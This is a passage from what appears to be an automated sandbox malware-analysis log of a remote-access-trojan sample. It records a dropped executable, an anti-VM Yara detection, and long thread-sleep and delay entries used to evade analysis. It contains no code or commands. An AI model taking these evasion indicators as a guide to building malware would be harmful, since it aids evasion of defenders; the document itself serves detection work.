                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 7CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: A470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: B470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: BA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: CA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: DA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 2280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 80F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 6B80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 90F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: A0F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: A710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: B710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: C710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 2880000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory allocated: 4880000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599250
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599140
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599031
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598922
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598812
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598484
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598375
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598265
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598156
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598047
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597828
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597718
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597609
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597500
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597387
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597281
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597172
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597062
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596952
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596843
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596734
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596625
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596515
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596406
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596297
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596187
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596078
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595969
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595859
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595750
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595640
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595531
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595422
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595312
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595203
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595094
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594984
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594875
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594765
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594656
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594547
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594437
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594328
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594219
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594109
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5752Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 515Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6394Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeWindow / User API: threadDelayed 1397
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeWindow / User API: threadDelayed 8468
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe TID: 7044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244Thread sleep count: 5752 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2148Thread sleep count: 515 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep count: 32 > 30
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -29514790517935264s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7904Thread sleep count: 1397 > 30
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -599250s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7904Thread sleep count: 8468 > 30
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -599140s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -599031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598594s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598484s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598375s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -598047s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597937s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597718s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597387s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -597062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596952s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596843s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -596078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595312s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -595094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594547s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe TID: 7900Thread sleep time: -594000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599250
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599140
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 599031
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598922
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598812
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598484
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598375
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598265
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598156
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 598047
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597828
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597718
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597609
